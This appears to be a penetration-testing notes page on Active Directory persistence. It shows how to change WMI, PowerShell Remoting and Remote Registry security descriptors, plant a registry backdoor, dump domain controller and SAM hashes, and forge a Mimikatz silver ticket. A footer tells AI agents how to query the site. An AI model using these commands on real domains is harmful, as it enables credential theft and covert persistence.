# Modifying Remote Protocol Security Descriptors This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited. You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges. Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin. ## Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace ### Step 1 - In Component Services, Change the DCOM Permissions of the Computer * Give the user Remote Access permissions ![](/files/fkNMZGvVVTOKHvmMTNyM) * Then give him all Launch and Activation permissions ![](/files/ze4kfBlEn8fmmvwsesYo) ### Step 2 - Modify the WMI Namespace Settings in Computer Management * Give the user full rights over the root WMI namespace ![](/files/aut3SNZ6wScPrPnZVU2b) * Then make sure those rights apply to all of the child namespaces as well ![](/files/LHW6oKbqM6KscF9PQYx6) ### Step 3 - Check the Access of the Non-Admin User to the DC ```powershell PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain SystemDirectory : C:\Windows\system32 Organization : BuildNumber : 14393 RegisteredUser : Windows User SerialNumber : 00377-80000-00000-AA805 Version : 10.0.14393 ``` Now our user can execute commands on the DC. ## Giving a User Access to WMI From Powershell ### With Set-RemoteWMI.ps1 (from Nishang) ```powershell . .\Set-RemoteWMI.ps1 Set-RemoteWMI -ComputerName -UserName -Namespace 'root\cimv2' -verbose [-Credential ] ``` Then login as that user and check the access: ```powershell Get-WmiObject -Class win32_operatingsystem -ComputerName ``` ### To Remove the Modified Descriptor ```powershell Set-RemoteWMI -ComputerName -UserName -Namespace 'root\cimv2' -verbose -Remove [-Credential ] ``` ## Change the Powershell Remoting Descriptors ### With Set-RemotePSRemoting.ps1 (from Nishang) ```powershell Set-RemotePSRemoting -UserName -ComputerName -Verbose ``` ### Then Execute Commands Remotely on the DC ```powershell Invoke-Command -ComputerName -ScriptBlock {} ``` ## Changing the Remote Registry to Add a Backdoor and Retrieve Hashes ### Step 1 - With Add-RemoteRegBackdoor.ps1 ```powershell . .\Add-RemoteRegBackdoor.ps1 Add-RemoteRegBackdoor -ComputerName -Trustee ``` ### Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1 ```powershell # Get the DC Machine Hash Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose # Dump the Local SAM Hashes Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose ``` ### Step 3 - Exploit * With the DC hash we can create Silver Tickets. ```powershell Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service: /rc4: /user:Administrator /ptt"' ``` * With the Local Administrator hash we can DCSync or take advantage of the local Administrator hash being the DSRM password. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/persistence/modifying-remote-protocol-security-descriptors.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.